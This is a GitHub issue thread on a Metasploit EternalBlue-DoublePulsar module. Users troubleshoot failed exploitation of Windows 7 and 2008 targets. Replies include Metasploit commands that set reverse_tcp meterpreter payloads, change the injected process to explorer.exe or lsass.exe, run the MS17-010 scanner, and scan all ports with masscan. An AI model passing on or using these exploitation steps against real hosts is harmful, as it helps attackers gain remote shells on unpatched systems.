Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1
1.09k stars 520 forks source link

. #42

Open Pauli-Isosomppi opened 7 years ago

UrielRicardo commented 7 years ago

give me details of your target

LAzyFrAAnk commented 7 years ago

@UrielRicardo
I have same problem Target windows 7 64 bits image

UrielRicardo commented 7 years ago

@LAzyFrAAnk Your architecture would not be 64 bits?

LAzyFrAAnk commented 7 years ago

@UrielRicardo 86 and 64 both tried, same this error

UrielRicardo commented 7 years ago

@LAzyFrAAnk Make sure the target architecture is correct, then use the proper payload:

set payload windows/x64/meterpreter/reverse_tcp - for 64 bit set payload windows/meterpreter/reverse_tcp - for x86 DO NOT FORGET X64, IT'S NOT IN YOUR IMAGE

manueld79 commented 7 years ago

I have the same issue with a windows 2008 x86. I have all setup fine, but not working kali-new-2017-06-19-14-33-10

fb11 commented 7 years ago

try set processinject explorer.exe

LAzyFrAAnk commented 7 years ago

@UrielRicardo still failure when I tried before.

Not sure something missing or not

image

LAzyFrAAnk commented 7 years ago

@carms642 it won't work after changed to explorer

manueld79 commented 7 years ago

Same when I set processinjection to explorer.exe.

kali-new-2017-06-19-18-19-17

UrielRicardo commented 7 years ago

@manueld79 try lsass.exe

barrett092 commented 7 years ago

Also does not work for me either, very frustrating. Testing on known vulnerable hosts.

elibr1212 commented 7 years ago

same issue :\

mkasjanowicz commented 7 years ago

same, someone help?

X0R1972 commented 7 years ago

i find this on a security website ,so maybe it help ""if you have patched your machines but not disabled SMBv1, the machine will be seen as at risk. So a false positive. Also remember to disable SMBv1 if you do not use it."" i have the same error and really tried everything so after i read this i think that the scanner find a vuln ip but its a false detection.

Cr11pt0 commented 6 years ago

has actually anybody managed to get around this problem ?

BigSperm commented 6 years ago

If you are doing this under Vm, set net Adapter settings as Bridge Replicated of source and target system both. Have you checked if the target is really vulnerable to smb ? use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS targetIp

ppdmartell commented 6 years ago

Yeah the same, still no solution.

manztihagi commented 6 years ago

In my opinion that target has been patched or port for 445 has been closed. I'm already tested for patched target and un-patched target.

Very easy for un-patched target to gain the system, but for patched target ... its shown failed.

Isa5710 commented 5 years ago

Error getting output back from core aborting

Joshua2point0 commented 5 years ago

if port 445 is closed use masscan for other open ports, then try another open port

masscan --ports 0-65535 if this doesnt work then its definatley patched and scanner giving FP

AoG22 commented 4 years ago

ANY ONE SOLVED IT ?